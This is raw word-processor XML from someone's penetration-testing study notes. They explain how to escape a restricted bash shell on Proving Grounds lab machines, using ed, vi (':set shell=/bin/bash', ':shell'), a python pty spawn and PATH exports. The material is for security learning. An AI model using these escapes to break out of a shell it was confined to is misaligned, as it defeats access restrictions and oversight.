    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000347C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="596"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Sunset Decoy PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000347D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000347E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000347F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h0m2k3m6p0ji" w:id="472"/>
      <w:bookmarkEnd w:id="472"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escaping restricted shell using ed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003480">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003481">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId1136">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Peppo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003482">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003483">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="876300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="424" name="image405.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image405.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1137"/>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3484">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003485">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that we have access to the "ed" binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003486">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003487">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After looking at GTFOBins, we see that ed has a "shell" section that allows us to get interactive shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003488">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1663700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="453" name="image441.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image441.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1138"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1663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489">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000348A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After running the above command we can export a new path and then spawn a python shell then again export the path to have full function over the shell session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000348B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000348C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5931017" cy="1494941"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="191" name="image185.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image185.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1139"/>
                    <a:srcRect b="0" l="0" r="41506" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5931017" cy="1494941"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000348D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000348E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000348F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003490">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Idk how they did it without the "export" command but if this doesn't work, just try prepending with "export"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003491">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003492">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1439"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003493">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003494">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003495">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003496">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_brojlv1qs641" w:id="473"/>
      <w:bookmarkEnd w:id="473"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escaping restricted shell using vi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003497">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003498">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Vi binary gives us the opportunity to escape the restricted shell. Once you open Vi, use the commands below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003499">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000349A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:set shell=/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000349B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="700"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This sets the default shell that vi uses when you run :shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000349C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="700"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, vi might use /bin/sh or /usr/bin/zsh or whatever is specified by SHELL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000349D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="700"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This only lasts while the Vi session is open. Once it closes, you will need to run this command again</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000349E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000349F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command drops you into a shell from inside vi (this is a subshell)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It will look like you are in the regular terminal, but your not. To test this, use the command "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and if you get sent back to Vi, then you were in the Vi subshell. To get back in, just type </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">again</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since you just set the shell to /bin/bash, this spawns a normal Bash shell, not rbash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is possible because vi is a whitelisted binary in your PATH, and rbash doesn't prevent shell escape inside vi.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After this, I set the environment variables to bash to run all commands properly inside of the Vi subshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH=/bin:/usr/bin:$PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="995"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Each colon separates the elements of the list. So we are setting the PATH variable equal to /bin, and also /usr/bin, and then $PATH, which is all of the old PATH variables. So, this is the same as prepending to the PATH list of variables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="995"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remember we put a $ before an environment variable to access it and tell the terminal we want to work with the environment variable. If we just put PATH, then terminal won't know we are talking about the env variable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="995"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This prepends /bin and /usr/bin to your existing $PATH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="995"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This allows you to run commands like cat, ls, cp, whoami, etc., without typing the full path (/bin/ls).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="995"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Without this, the shell might still only look in /home/tom/usr/bin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034AC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export SHELL=/bin/bash:$SHELL</w:t>
      </w:r>
    </w:p>
